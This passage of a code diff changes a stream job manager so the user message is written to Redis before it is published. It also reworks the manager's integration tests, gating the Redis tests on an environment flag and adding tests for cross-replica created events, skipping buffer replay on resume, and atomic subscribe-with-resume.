* Awaited in emitChunk so the HSET commits before the PUBLISH, + * guaranteeing any cross-replica getJob() after the pub/sub window + * finds userMessage in Redis. 
*/ - private trackUserMessage(streamId: string, event: t.ServerSentEvent): void { - const data = event as Record; - if (!data.created || !data.message) { + private async trackUserMessage(streamId: string, event: t.ServerSentEvent): Promise { + if (!('created' in event)) { return; } - const message = data.message as Record; + const { message } = event; const updates: Partial = { userMessage: { - messageId: message.messageId as string, - parentMessageId: message.parentMessageId as string | undefined, - conversationId: message.conversationId as string | undefined, - text: message.text as string | undefined, + messageId: message.messageId, + parentMessageId: message.parentMessageId, + conversationId: message.conversationId, + text: message.text, }, }; if (message.conversationId) { - updates.conversationId = message.conversationId as string; + updates.conversationId = message.conversationId; } - this.jobStore.updateJob(streamId, updates); + await this.jobStore.updateJob(streamId, updates); } /** diff --git a/packages/api/src/stream/__tests__/GenerationJobManager.stream_integration.spec.ts b/packages/api/src/stream/__tests__/GenerationJobManager.stream_integration.spec.ts index 59fe32e4e5..3e85ace56d 100644 --- a/packages/api/src/stream/__tests__/GenerationJobManager.stream_integration.spec.ts +++ b/packages/api/src/stream/__tests__/GenerationJobManager.stream_integration.spec.ts @@ -1,5 +1,6 @@ +/* eslint jest/no-standalone-expect: ["error", { "additionalTestBlockFunctions": ["testRedis"] }] */ import type { Redis, Cluster } from 'ioredis'; -import type { ServerSentEvent } from '~/types/events'; +import type { ServerSentEvent, StreamEvent, CreatedEvent } from '~/types'; import { InMemoryEventTransport } from '~/stream/implementations/InMemoryEventTransport'; import { RedisEventTransport } from '~/stream/implementations/RedisEventTransport'; import { InMemoryJobStore } from '~/stream/implementations/InMemoryJobStore'; @@ -27,6 +28,9 @@ describe('GenerationJobManager 
Integration Tests', () => { let dynamicKeyvClient: unknown = null; let dynamicKeyvReady: Promise | null = null; const testPrefix = 'JobManager-Integration-Test'; + const redisConfigured = process.env.USE_REDIS === 'true'; + const describeRedis = redisConfigured ? describe : describe.skip; + const testRedis = redisConfigured ? test : test.skip; beforeAll(async () => { originalEnv = { ...process.env }; @@ -82,6 +86,68 @@ describe('GenerationJobManager Integration Tests', () => { process.env = originalEnv; }); + function createInMemoryManager(): GenerationJobManagerClass { + const manager = new GenerationJobManagerClass(); + manager.configure({ + jobStore: new InMemoryJobStore({ ttlAfterComplete: 60000 }), + eventTransport: new InMemoryEventTransport(), + isRedis: false, + }); + manager.initialize(); + return manager; + } + + function createRedisManager(): GenerationJobManagerClass { + const manager = new GenerationJobManagerClass(); + manager.configure( + createStreamServices({ + useRedis: true, + redisClient: ioredisClient!, + }), + ); + manager.initialize(); + return manager; + } + + async function setupDisconnectedStream( + manager: GenerationJobManagerClass, + streamId: string, + delay: number, + ): Promise { + const firstEvents: ServerSentEvent[] = []; + const sub = await manager.subscribe(streamId, (event) => firstEvents.push(event)); + + await new Promise((resolve) => setTimeout(resolve, delay)); + + await manager.emitChunk(streamId, { + event: 'on_run_step', + data: { id: 'step-1', runId: 'run-1', index: 0, stepDetails: { type: 'message_creation' } }, + }); + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { id: 'step-1', delta: { content: { type: 'text', text: 'Hello' } } }, + }); + + await new Promise((resolve) => setTimeout(resolve, delay)); + expect(firstEvents.length).toBe(2); + + sub?.unsubscribe(); + await new Promise((resolve) => setTimeout(resolve, delay)); + + await manager.emitChunk(streamId, { + event: 'on_message_delta', 
+ data: { id: 'step-1', delta: { content: { type: 'text', text: ' world' } } }, + }); + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { id: 'step-1', delta: { content: { type: 'text', text: '!' } } }, + }); + + await new Promise((resolve) => setTimeout(resolve, delay)); + + return firstEvents; + } + describe('In-Memory Mode', () => { test('should create and manage jobs', async () => { // Configure with in-memory @@ -171,13 +237,8 @@ describe('GenerationJobManager Integration Tests', () => { }); }); - describe('Redis Mode', () => { + describeRedis('Redis Mode', () => { test('should create and manage jobs via Redis', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - // Create Redis services const services = createStreamServices({ useRedis: true, @@ -209,11 +270,6 @@ describe('GenerationJobManager Integration Tests', () => { }); test('should persist chunks for cross-instance resume', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - const services = createStreamServices({ useRedis: true, redisClient: ioredisClient, @@ -264,11 +320,6 @@ describe('GenerationJobManager Integration Tests', () => { }); test('should handle abort and return content', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - const services = createStreamServices({ useRedis: true, redisClient: ioredisClient, @@ -374,7 +425,7 @@ describe('GenerationJobManager Integration Tests', () => { }); }); - describe('Cross-Replica Support (Redis)', () => { + describeRedis('Cross-Replica Support (Redis)', () => { /** * Problem: In k8s with Redis and multiple replicas, when a user sends a message: * 1. POST /api/agents/chat hits Replica A, creates job @@ -387,15 +438,10 @@ describe('GenerationJobManager Integration Tests', () => { * when the job exists in Redis but not in local memory. 
*/ test('should NOT return 404 when stream endpoint hits different replica than job creator', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - // === REPLICA A: Creates the job === // Simulate Replica A creating the job directly in Redis // (In real scenario, this happens via GenerationJobManager.createJob on Replica A) - const replicaAJobStore = new RedisJobStore(ioredisClient); + const replicaAJobStore = new RedisJobStore(ioredisClient!); await replicaAJobStore.initialize(); const streamId = `cross-replica-404-test-${Date.now()}`; @@ -452,13 +498,8 @@ describe('GenerationJobManager Integration Tests', () => { }); test('should lazily create runtime state for jobs created on other replicas', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - // Instance 1: Create the job directly in Redis (simulating another replica) - const jobStore = new RedisJobStore(ioredisClient); + const jobStore = new RedisJobStore(ioredisClient!); await jobStore.initialize(); const streamId = `cross-replica-${Date.now()}`; @@ -500,11 +541,6 @@ describe('GenerationJobManager Integration Tests', () => { }); test('should persist syncSent to Redis for cross-replica consistency', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - const services = createStreamServices({ useRedis: true, redisClient: ioredisClient, @@ -539,11 +575,6 @@ describe('GenerationJobManager Integration Tests', () => { }); test('should persist finalEvent to Redis for cross-replica access', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - const services = createStreamServices({ useRedis: true, redisClient: ioredisClient, @@ -581,11 +612,6 @@ describe('GenerationJobManager Integration Tests', () => { }); test('should emit cross-replica abort signal via Redis pub/sub', async () => { - if 
(!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - const services = createStreamServices({ useRedis: true, redisClient: ioredisClient, @@ -620,16 +646,11 @@ describe('GenerationJobManager Integration Tests', () => { }); test('should handle abort for lazily-initialized cross-replica jobs', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - // This test validates that jobs created on Replica A and lazily-initialized // on Replica B can still receive and handle abort signals. // === Replica A: Create job directly in Redis === - const replicaAJobStore = new RedisJobStore(ioredisClient); + const replicaAJobStore = new RedisJobStore(ioredisClient!); await replicaAJobStore.initialize(); const streamId = `lazy-abort-${Date.now()}`; @@ -675,11 +696,6 @@ describe('GenerationJobManager Integration Tests', () => { }); test('should abort generation when abort signal received from another replica', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - // This test simulates: // 1. Replica A creates a job and starts generation // 2. 
Replica B receives abort request and emits abort signal @@ -729,13 +745,8 @@ describe('GenerationJobManager Integration Tests', () => { }); test('should handle wasSyncSent for cross-replica scenarios', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - // Create job directly in Redis with syncSent: true - const jobStore = new RedisJobStore(ioredisClient); + const jobStore = new RedisJobStore(ioredisClient!); await jobStore.initialize(); const streamId = `cross-sync-${Date.now()}`; @@ -760,9 +771,130 @@ describe('GenerationJobManager Integration Tests', () => { await GenerationJobManager.destroy(); await jobStore.destroy(); }); + + test('should emit created event from metadata on cross-replica subscribe', async () => { + const replicaAJobStore = new RedisJobStore(ioredisClient!); + await replicaAJobStore.initialize(); + + const streamId = `cross-created-${Date.now()}`; + const userId = 'test-user'; + + await replicaAJobStore.createJob(streamId, userId); + await replicaAJobStore.updateJob(streamId, { + userMessage: { + messageId: 'msg-123', + parentMessageId: '00000000-0000-0000-0000-000000000000', + conversationId: streamId, + text: 'hello world', + }, + }); + + jest.resetModules(); + + const services = createStreamServices({ + useRedis: true, + redisClient: ioredisClient, + }); + + GenerationJobManager.configure(services); + GenerationJobManager.initialize(); + + const received: unknown[] = []; + const subscription = await GenerationJobManager.subscribe( + streamId, + (event) => received.push(event), + ); + + expect(subscription).not.toBeNull(); + expect(received.length).toBe(1); + + const created = received[0] as CreatedEvent; + expect(created.created).toBe(true); + expect(created.streamId).toBe(streamId); + expect(created.message.messageId).toBe('msg-123'); + expect(created.message.conversationId).toBe(streamId); + expect(created.message.sender).toBe('User'); + 
expect(created.message.isCreatedByUser).toBe(true); + + subscription?.unsubscribe(); + await GenerationJobManager.destroy(); + await replicaAJobStore.destroy(); + }); + + test('should NOT emit created event from metadata when userMessage is not set', async () => { + const replicaAJobStore = new RedisJobStore(ioredisClient!); + await replicaAJobStore.initialize(); + + const streamId = `cross-no-created-${Date.now()}`; + await replicaAJobStore.createJob(streamId, 'test-user'); + + jest.resetModules(); + + const services = createStreamServices({ + useRedis: true, + redisClient: ioredisClient, + }); + + GenerationJobManager.configure(services); + GenerationJobManager.initialize(); + + const received: unknown[] = []; + const subscription = await GenerationJobManager.subscribe( + streamId, + (event) => received.push(event), + ); + + expect(subscription).not.toBeNull(); + expect(received.length).toBe(0); + + subscription?.unsubscribe(); + await GenerationJobManager.destroy(); + await replicaAJobStore.destroy(); + }); + + test('should NOT emit created event when skipBufferReplay is true (resume path)', async () => { + const replicaAJobStore = new RedisJobStore(ioredisClient!); + await replicaAJobStore.initialize(); + + const streamId = `cross-no-replay-${Date.now()}`; + await replicaAJobStore.createJob(streamId, 'test-user'); + await replicaAJobStore.updateJob(streamId, { + userMessage: { + messageId: 'msg-456', + conversationId: streamId, + text: 'hi', + }, + }); + + jest.resetModules(); + + const services = createStreamServices({ + useRedis: true, + redisClient: ioredisClient, + }); + + GenerationJobManager.configure(services); + GenerationJobManager.initialize(); + + const received: unknown[] = []; + const subscription = await GenerationJobManager.subscribe( + streamId, + (event) => received.push(event), + undefined, + undefined, + { skipBufferReplay: true }, + ); + + expect(subscription).not.toBeNull(); + expect(received.length).toBe(0); + + 
subscription?.unsubscribe(); + await GenerationJobManager.destroy(); + await replicaAJobStore.destroy(); + }); }); - describe('Sequential Event Ordering (Redis)', () => { + describeRedis('Sequential Event Ordering (Redis)', () => { /** * These tests verify that events are delivered in strict sequential order * when using Redis mode. This is critical because: @@ -773,11 +905,6 @@ describe('GenerationJobManager Integration Tests', () => { * The fix: emitChunk now awaits Redis publish to ensure ordered delivery. */ test('should maintain strict order for rapid sequential emits', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - jest.resetModules(); const services = createStreamServices({ @@ -823,11 +950,6 @@ describe('GenerationJobManager Integration Tests', () => { }); test('should maintain order for tool call argument deltas', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - jest.resetModules(); const services = createStreamServices({ @@ -882,11 +1004,6 @@ describe('GenerationJobManager Integration Tests', () => { }); test('should maintain order: on_run_step before on_run_step_delta', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - jest.resetModules(); const services = createStreamServices({ @@ -945,11 +1062,6 @@ describe('GenerationJobManager Integration Tests', () => { }); test('should not block other streams when awaiting emitChunk', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - jest.resetModules(); const services = createStreamServices({ @@ -1049,7 +1161,7 @@ describe('GenerationJobManager Integration Tests', () => { created: true, message: { text: 'hello' }, streamId, - } as unknown as ServerSentEvent); + } as CreatedEvent); await manager.emitChunk(streamId, { event: 'on_message_delta', data: { delta: { content: { type: 'text', 
text: 'First chunk' } } }, @@ -1069,12 +1181,7 @@ describe('GenerationJobManager Integration Tests', () => { await manager.destroy(); }); - test('should buffer and replay events emitted before subscribe (Redis)', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - + testRedis('should buffer and replay events emitted before subscribe (Redis)', async () => { const manager = new GenerationJobManagerClass(); const services = createStreamServices({ useRedis: true, @@ -1091,7 +1198,7 @@ describe('GenerationJobManager Integration Tests', () => { created: true, message: { text: 'hello' }, streamId, - } as unknown as ServerSentEvent); + } as CreatedEvent); await manager.emitChunk(streamId, { event: 'on_message_delta', data: { delta: { content: { type: 'text', text: 'First' } } }, @@ -1118,67 +1225,60 @@ describe('GenerationJobManager Integration Tests', () => { await manager.destroy(); }); - test('should not lose events when emitting before and after subscribe (Redis)', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - - const manager = new GenerationJobManagerClass(); - const services = createStreamServices({ - useRedis: true, - redisClient: ioredisClient, - }); - - manager.configure(services); - manager.initialize(); - - const streamId = `no-loss-${Date.now()}`; - await manager.createJob(streamId, 'user-1'); - - await manager.emitChunk(streamId, { - created: true, - message: { text: 'hello' }, - streamId, - } as unknown as ServerSentEvent); - await manager.emitChunk(streamId, { - event: 'on_run_step', - data: { id: 'step-1', type: 'message_creation', index: 0 }, - }); - - const receivedEvents: unknown[] = []; - const subscription = await manager.subscribe(streamId, (event: unknown) => - receivedEvents.push(event), - ); - - await new Promise((resolve) => setTimeout(resolve, 100)); - - for (let i = 0; i < 10; i++) { - await manager.emitChunk(streamId, { - event: 
'on_message_delta', - data: { delta: { content: { type: 'text', text: `word${i} ` } }, index: i }, + testRedis( + 'should not lose events when emitting before and after subscribe (Redis)', + async () => { + const manager = new GenerationJobManagerClass(); + const services = createStreamServices({ + useRedis: true, + redisClient: ioredisClient, }); - } - await new Promise((resolve) => setTimeout(resolve, 300)); + manager.configure(services); + manager.initialize(); - expect(receivedEvents.length).toBe(12); - expect((receivedEvents[0] as Record).created).toBe(true); - expect((receivedEvents[1] as Record).event).toBe('on_run_step'); - for (let i = 0; i < 10; i++) { - expect((receivedEvents[i + 2] as Record).event).toBe('on_message_delta'); - } + const streamId = `no-loss-${Date.now()}`; + await manager.createJob(streamId, 'user-1'); - subscription?.unsubscribe(); - await manager.destroy(); - }); + await manager.emitChunk(streamId, { + created: true, + message: { text: 'hello' }, + streamId, + } as CreatedEvent); + await manager.emitChunk(streamId, { + event: 'on_run_step', + data: { id: 'step-1', type: 'message_creation', index: 0 }, + }); - test('RedisEventTransport.subscribe() should return a ready promise', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } + const receivedEvents: unknown[] = []; + const subscription = await manager.subscribe(streamId, (event: unknown) => + receivedEvents.push(event), + ); + await new Promise((resolve) => setTimeout(resolve, 100)); + + for (let i = 0; i < 10; i++) { + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { delta: { content: { type: 'text', text: `word${i} ` } }, index: i }, + }); + } + + await new Promise((resolve) => setTimeout(resolve, 300)); + + expect(receivedEvents.length).toBe(12); + expect((receivedEvents[0] as Record).created).toBe(true); + expect((receivedEvents[1] as Record).event).toBe('on_run_step'); + for (let i = 0; i < 10; i++) 
{ + expect((receivedEvents[i + 2] as Record).event).toBe('on_message_delta'); + } + + subscription?.unsubscribe(); + await manager.destroy(); + }, + ); + + testRedis('RedisEventTransport.subscribe() should return a ready promise', async () => { const subscriber = (ioredisClient as unknown as { duplicate: () => unknown }).duplicate(); const transport = new RedisEventTransport(ioredisClient as never, subscriber as never); @@ -1211,6 +1311,421 @@ describe('GenerationJobManager Integration Tests', () => { }); }); + describe('Resume: skipBufferReplay prevents duplication', () => { + /** + * Verifies the fix for duplicated content when navigating away from an + * in-progress conversation and back. Events accumulate in earlyEventBuffer + * while the subscriber is absent. On resume, the sync event delivers all + * accumulated content via aggregatedContent, so buffer replay must be + * skipped to prevent duplication. + */ + + test('should NOT replay buffer when skipBufferReplay is true (resume scenario)', async () => { + const manager = createInMemoryManager(); + const streamId = `skip-buf-${Date.now()}`; + await manager.createJob(streamId, 'user-1'); + + await setupDisconnectedStream(manager, streamId, 10); + + const resumeState = await manager.getResumeState(streamId); + expect(resumeState).not.toBeNull(); + + const resumeEvents: ServerSentEvent[] = []; + const sub2 = await manager.subscribe( + streamId, + (event) => resumeEvents.push(event), + undefined, + undefined, + { skipBufferReplay: true }, + ); + + await new Promise((resolve) => setTimeout(resolve, 20)); + expect(resumeEvents.length).toBe(0); + + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { id: 'step-1', delta: { content: { type: 'text', text: ' Live!' 
} } }, + }); + + await new Promise((resolve) => setTimeout(resolve, 20)); + expect(resumeEvents.length).toBe(1); + expect((resumeEvents[0] as StreamEvent).event).toBe('on_message_delta'); + + sub2?.unsubscribe(); + await manager.destroy(); + }); + + test('should replay buffer by default when no options are passed', async () => { + const manager = createInMemoryManager(); + const streamId = `replay-buf-${Date.now()}`; + await manager.createJob(streamId, 'user-1'); + + const sub1Events: ServerSentEvent[] = []; + const sub1 = await manager.subscribe(streamId, (event) => sub1Events.push(event)); + await new Promise((resolve) => setTimeout(resolve, 10)); + + await manager.emitChunk(streamId, { + event: 'on_run_step', + data: { id: 'step-1', runId: 'run-1', index: 0, stepDetails: { type: 'message_creation' } }, + }); + await new Promise((resolve) => setTimeout(resolve, 10)); + + sub1?.unsubscribe(); + await new Promise((resolve) => setTimeout(resolve, 20)); + + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { id: 'step-1', delta: { content: { type: 'text', text: 'buffered' } } }, + }); + + const sub2Events: ServerSentEvent[] = []; + const sub2 = await manager.subscribe(streamId, (event) => sub2Events.push(event)); + await new Promise((resolve) => setTimeout(resolve, 20)); + + expect(sub2Events.length).toBe(1); + expect((sub2Events[0] as StreamEvent).event).toBe('on_message_delta'); + + sub2?.unsubscribe(); + await manager.destroy(); + }); + + test('should clear earlyEventBuffer even when skipping replay (no memory leak)', async () => { + const manager = createInMemoryManager(); + const streamId = `buf-clear-${Date.now()}`; + await manager.createJob(streamId, 'user-1'); + + const sub1 = await manager.subscribe(streamId, () => {}); + await new Promise((resolve) => setTimeout(resolve, 10)); + sub1?.unsubscribe(); + await new Promise((resolve) => setTimeout(resolve, 20)); + + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { 
delta: { content: { type: 'text', text: 'buf1' } } }, + }); + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { delta: { content: { type: 'text', text: 'buf2' } } }, + }); + + const sub2Events: ServerSentEvent[] = []; + const sub2 = await manager.subscribe( + streamId, + (event) => sub2Events.push(event), + undefined, + undefined, + { skipBufferReplay: true }, + ); + await new Promise((resolve) => setTimeout(resolve, 20)); + expect(sub2Events.length).toBe(0); + + sub2?.unsubscribe(); + await new Promise((resolve) => setTimeout(resolve, 20)); + + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { delta: { content: { type: 'text', text: 'new-event' } } }, + }); + + const sub3Events: ServerSentEvent[] = []; + const sub3 = await manager.subscribe(streamId, (event) => sub3Events.push(event)); + await new Promise((resolve) => setTimeout(resolve, 20)); + + expect(sub3Events.length).toBe(1); + const event = sub3Events[0] as { + event: string; + data: { delta: { content: { text: string } } }; + }; + expect(event.data.delta.content.text).toBe('new-event'); + + sub3?.unsubscribe(); + await manager.destroy(); + }); + + test('should handle multiple disconnect/reconnect cycles with skipBufferReplay', async () => { + const manager = createInMemoryManager(); + const streamId = `multi-reconnect-${Date.now()}`; + await manager.createJob(streamId, 'user-1'); + + const sub1 = await manager.subscribe(streamId, () => {}); + await new Promise((resolve) => setTimeout(resolve, 10)); + + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { delta: { content: { type: 'text', text: 'initial' } } }, + }); + await new Promise((resolve) => setTimeout(resolve, 10)); + + sub1?.unsubscribe(); + await new Promise((resolve) => setTimeout(resolve, 20)); + + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { delta: { content: { type: 'text', text: 'buffered-1' } } }, + }); + + const resumeState1 = await 
manager.getResumeState(streamId); + expect(resumeState1).not.toBeNull(); + + const sub2Events: ServerSentEvent[] = []; + const sub2 = await manager.subscribe( + streamId, + (event) => sub2Events.push(event), + undefined, + undefined, + { skipBufferReplay: true }, + ); + await new Promise((resolve) => setTimeout(resolve, 10)); + expect(sub2Events.length).toBe(0); + + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { delta: { content: { type: 'text', text: 'live-1' } } }, + }); + await new Promise((resolve) => setTimeout(resolve, 10)); + expect(sub2Events.length).toBe(1); + + sub2?.unsubscribe(); + await new Promise((resolve) => setTimeout(resolve, 20)); + + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { delta: { content: { type: 'text', text: 'buffered-2' } } }, + }); + + const resumeState2 = await manager.getResumeState(streamId); + expect(resumeState2).not.toBeNull(); + + const sub3Events: ServerSentEvent[] = []; + const sub3 = await manager.subscribe( + streamId, + (event) => sub3Events.push(event), + undefined, + undefined, + { skipBufferReplay: true }, + ); + await new Promise((resolve) => setTimeout(resolve, 10)); + expect(sub3Events.length).toBe(0); + + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { delta: { content: { type: 'text', text: 'live-2' } } }, + }); + await new Promise((resolve) => setTimeout(resolve, 10)); + expect(sub3Events.length).toBe(1); + + sub3?.unsubscribe(); + await manager.destroy(); + }); + + testRedis('should NOT replay buffer when skipBufferReplay is true (Redis)', async () => { + const manager = createRedisManager(); + const streamId = `skip-buf-redis-${Date.now()}`; + await manager.createJob(streamId, 'user-1'); + + await setupDisconnectedStream(manager, streamId, 100); + + const resumeState = await manager.getResumeState(streamId); + expect(resumeState).not.toBeNull(); + expect(resumeState!.aggregatedContent?.length).toBeGreaterThan(0); + + const 
resumeEvents: ServerSentEvent[] = []; + const sub2 = await manager.subscribe( + streamId, + (event) => resumeEvents.push(event), + undefined, + undefined, + { skipBufferReplay: true }, + ); + + await new Promise((resolve) => setTimeout(resolve, 200)); + expect(resumeEvents.length).toBe(0); + + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { id: 'step-1', delta: { content: { type: 'text', text: ' Live!' } } }, + }); + + await new Promise((resolve) => setTimeout(resolve, 200)); + expect(resumeEvents.length).toBe(1); + expect((resumeEvents[0] as StreamEvent).event).toBe('on_message_delta'); + + sub2?.unsubscribe(); + await manager.destroy(); + }); + + testRedis( + 'should replay buffer without skipBufferReplay after disconnect (Redis)', + async () => { + const manager = createRedisManager(); + const streamId = `replay-buf-redis-${Date.now()}`; + await manager.createJob(streamId, 'user-1'); + + const sub1 = await manager.subscribe(streamId, () => {}); + await new Promise((resolve) => setTimeout(resolve, 100)); + sub1?.unsubscribe(); + await new Promise((resolve) => setTimeout(resolve, 100)); + + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { delta: { content: { type: 'text', text: 'buffered-redis' } } }, + }); + + await new Promise((resolve) => setTimeout(resolve, 100)); + + const sub2Events: ServerSentEvent[] = []; + const sub2 = await manager.subscribe(streamId, (event) => sub2Events.push(event)); + + await new Promise((resolve) => setTimeout(resolve, 200)); + + expect(sub2Events.length).toBe(1); + expect((sub2Events[0] as StreamEvent).event).toBe('on_message_delta'); + + sub2?.unsubscribe(); + await manager.destroy(); + }, + ); + }); + + describe('Atomic subscribeWithResume', () => { + test('should return empty pendingEvents for pre-snapshot buffer events (in-memory)', async () => { + const manager = createInMemoryManager(); + const streamId = `atomic-drain-${Date.now()}`; + await manager.createJob(streamId, 
'user-1'); + + const sub1 = await manager.subscribe(streamId, () => {}); + await new Promise((resolve) => setTimeout(resolve, 10)); + sub1?.unsubscribe(); + await new Promise((resolve) => setTimeout(resolve, 20)); + + await manager.emitChunk(streamId, { + event: 'on_run_step', + data: { id: 'step-1', runId: 'run-1', index: 0, stepDetails: { type: 'message_creation' } }, + }); + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { id: 'step-1', delta: { content: { type: 'text', text: 'buffered' } } }, + }); + + const liveEvents: ServerSentEvent[] = []; + const { subscription, resumeState, pendingEvents } = await manager.subscribeWithResume( + streamId, + (event) => liveEvents.push(event), + ); + + expect(resumeState).not.toBeNull(); + expect(pendingEvents.length).toBe(0); + expect(liveEvents.length).toBe(0); + + subscription?.unsubscribe(); + await manager.destroy(); + }); + + test('should return empty pendingEvents when buffer is empty', async () => { + const manager = createInMemoryManager(); + const streamId = `atomic-empty-${Date.now()}`; + await manager.createJob(streamId, 'user-1'); + + const sub1 = await manager.subscribe(streamId, () => {}); + await new Promise((resolve) => setTimeout(resolve, 10)); + + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { delta: { content: { type: 'text', text: 'delivered' } } }, + }); + await new Promise((resolve) => setTimeout(resolve, 10)); + + sub1?.unsubscribe(); + await new Promise((resolve) => setTimeout(resolve, 20)); + + const { pendingEvents } = await manager.subscribeWithResume(streamId, () => {}); + + expect(pendingEvents.length).toBe(0); + + await manager.destroy(); + }); + + test('should deliver live events after subscribeWithResume', async () => { + const manager = createInMemoryManager(); + const streamId = `atomic-live-${Date.now()}`; + await manager.createJob(streamId, 'user-1'); + + const sub1 = await manager.subscribe(streamId, () => {}); + await new 
Promise((resolve) => setTimeout(resolve, 10)); + sub1?.unsubscribe(); + await new Promise((resolve) => setTimeout(resolve, 20)); + + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { delta: { content: { type: 'text', text: 'buffered-pre-snapshot' } } }, + }); + + const liveEvents: ServerSentEvent[] = []; + const { subscription, pendingEvents } = await manager.subscribeWithResume(streamId, (event) => + liveEvents.push(event), + ); + + expect(pendingEvents.length).toBe(0); + expect(liveEvents.length).toBe(0); + + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { delta: { content: { type: 'text', text: 'live-after' } } }, + }); + + await new Promise((resolve) => setTimeout(resolve, 20)); + expect(liveEvents.length).toBe(1); + const liveEvent = liveEvents[0] as { + event: string; + data: { delta: { content: { text: string } } }; + }; + expect(liveEvent.data.delta.content.text).toBe('live-after'); + + subscription?.unsubscribe(); + await manager.destroy(); + }); + + testRedis( + 'should return empty pendingEvents in Redis mode (chunks already persisted)', + async () => { + const manager = createRedisManager(); + const streamId = `atomic-redis-${Date.now()}`; + await manager.createJob(streamId, 'user-1'); + + const sub1 = await manager.subscribe(streamId, () => {}); + await new Promise((resolve) => setTimeout(resolve, 100)); + sub1?.unsubscribe(); + await new Promise((resolve) => setTimeout(resolve, 100)); + + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { delta: { content: { type: 'text', text: 'buffered-redis' } } }, + }); + await new Promise((resolve) => setTimeout(resolve, 100)); + + const liveEvents: ServerSentEvent[] = []; + const { subscription, resumeState, pendingEvents } = await manager.subscribeWithResume( + streamId, + (event) => liveEvents.push(event), + ); + + expect(resumeState).not.toBeNull(); + expect(pendingEvents.length).toBe(0); + + await manager.emitChunk(streamId, { + 
event: 'on_message_delta', + data: { delta: { content: { type: 'text', text: 'live-redis' } } }, + }); + + await new Promise((resolve) => setTimeout(resolve, 200)); + expect(liveEvents.length).toBe(1); + + subscription?.unsubscribe(); + await manager.destroy(); + }, + ); + }); + describe('Error Preservation for Late Subscribers', () => { /** * These tests verify the fix for the race condition where errors @@ -1369,14 +1884,9 @@ describe('GenerationJobManager Integration Tests', () => { await GenerationJobManager.destroy(); }); - test('should handle error preservation in Redis mode (cross-replica)', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - + testRedis('should handle error preservation in Redis mode (cross-replica)', async () => { // === Replica A: Creates job and emits error === - const replicaAJobStore = new RedisJobStore(ioredisClient); + const replicaAJobStore = new RedisJobStore(ioredisClient!); await replicaAJobStore.initialize(); const streamId = `redis-error-${Date.now()}`; @@ -1463,13 +1973,8 @@ describe('GenerationJobManager Integration Tests', () => { }); }); - describe('Cross-Replica Live Streaming (Redis)', () => { + describeRedis('Cross-Replica Live Streaming (Redis)', () => { test('should publish events to Redis even when no local subscriber exists', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - const replicaA = new GenerationJobManagerClass(); const servicesA = createStreamServices({ useRedis: true, @@ -1489,7 +1994,7 @@ describe('GenerationJobManager Integration Tests', () => { const streamId = `cross-live-${Date.now()}`; await replicaA.createJob(streamId, 'user-1'); - const replicaBJobStore = new RedisJobStore(ioredisClient); + const replicaBJobStore = new RedisJobStore(ioredisClient!); await replicaBJobStore.initialize(); await replicaBJobStore.createJob(streamId, 'user-1'); @@ -1519,11 +2024,6 @@ 
describe('GenerationJobManager Integration Tests', () => { }); test('should not cause data loss on cross-replica subscribers when local subscriber joins', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - const replicaA = new GenerationJobManagerClass(); const servicesA = createStreamServices({ useRedis: true, @@ -1543,7 +2043,7 @@ describe('GenerationJobManager Integration Tests', () => { const streamId = `cross-seq-safe-${Date.now()}`; await replicaA.createJob(streamId, 'user-1'); - const replicaBJobStore = new RedisJobStore(ioredisClient); + const replicaBJobStore = new RedisJobStore(ioredisClient!); await replicaBJobStore.initialize(); await replicaBJobStore.createJob(streamId, 'user-1'); @@ -1603,11 +2103,6 @@ describe('GenerationJobManager Integration Tests', () => { }); test('should deliver buffered events locally AND publish live events cross-replica', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - const replicaA = new GenerationJobManagerClass(); const servicesA = createStreamServices({ useRedis: true, @@ -1623,7 +2118,7 @@ describe('GenerationJobManager Integration Tests', () => { created: true, message: { text: 'hello' }, streamId, - } as unknown as ServerSentEvent); + } as CreatedEvent); const receivedOnA: unknown[] = []; const subA = await replicaA.subscribe(streamId, (event: unknown) => 